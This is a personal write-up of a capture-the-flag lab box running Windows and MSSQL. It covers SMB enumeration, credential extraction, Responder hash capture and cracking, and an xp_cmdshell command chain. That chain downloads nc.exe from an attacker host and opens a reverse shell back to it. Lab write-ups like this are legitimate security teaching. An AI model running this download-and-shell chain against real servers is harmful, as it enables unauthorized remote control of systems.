Late to the party on posting this write-up, think it was retired 2 weeks ago but this box was a blast and probably only the 2nd one I’ve ever done where I got to use Responder on a CTF. This one is going to be screenshot heavy as a lot of the work was done in a SQL database and required a lot of steps that would be hard to follow along with without.
135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: QUERIER | DNS_Domain_Name: HTB.LOCAL | DNS_Computer_Name: QUERIER.HTB.LOCAL | DNS_Tree_Name: HTB.LOCAL |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2019-05-26T01:05:06 |_Not valid after: 2049-05-26T01:05:06 |_ssl-date: 2019-05-26T01:14:14+00:00; +9s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC
NMAP scan tells us we’re gonna be dealing with a Windows box, and with SMB enabled that’s usually my first place to look assuming it allows guest connections. This one does allow for it so it’s possible to connect with:
smbclient \\10.10.10.125 -U 'Guest'
When prompted for the password, just press enter and then we can start looking around for anything of value. This machine had a file called ‘vbaProject.bin’ that seemed out of place, and running ‘strings’ against it gives us a database password that’ll be key in pretty much the entirety of the rest of the box.
Next step involves using part of the Impacket collection, specifically the mssqlclient aspect of it that will allow us to run some of the commands necessary for RCE.
I then looked into a previous write-up on the ‘mantis’ box here to find some of the SQL commands needed in order to get this working.
Interesting, so we can get the SMB server to communicate with our attacking box, this is the exact sort of situation Responder was created for to potentially get a hash to crack later.
Siiiiick! Got a hash to crack with that, so just have to throw it into hashcat with the rockyou wordlist and find that we’ve now got a valid credential to get onto the box itself with.
The command above failed unfortunately, which made me think that maybe the user we had privileges as did not have permission to write to the Temp folder. The user did have their own set of home directories, however, so found that it was possible to write into the ‘mssql-svc/documents’ folder as that user. Next step just involved getting that nc.exe into the proper folder then sending out a reverse shell to my attacking machine.
That sequence of commands:
python /usr/share/doc/python-impacket/examples/mssqlclient.py -db Volume firstname.lastname@example.org -windows-auth corporate568 enable xp_cmdshell xp_cmdshell "powershell -command (New-Object System.Net.WebClient).DownloadFile(\"http://10.10.14.30:8000/nc.exe\", \"C:\Users\mssql-svc\documents\nc.exe\")" SQL> xp_cmdshell "C:\users\mssql-svc\documents\nc.exe -nv 10.10.14.30 9995 -e cmd.exe"
PrivEsc to System
I searched around the box with my new privileges but couldn’t find anything that blatantly stood out to me and decided to get PowerUp onto the server which led to a juicy little group policy file:
That password allows us to connect to the SMB share as the administrator which leads us to the root flag! Not really a proper privesc in my book as it’s just plaintext credentials, but you’d really be surprised by how often this happens in the real world.
Really enjoyed this box, I felt it was one of the more real-life applicable ones that I’ve done recently and getting to use Responder on a CTF with only one connected machine was really well done.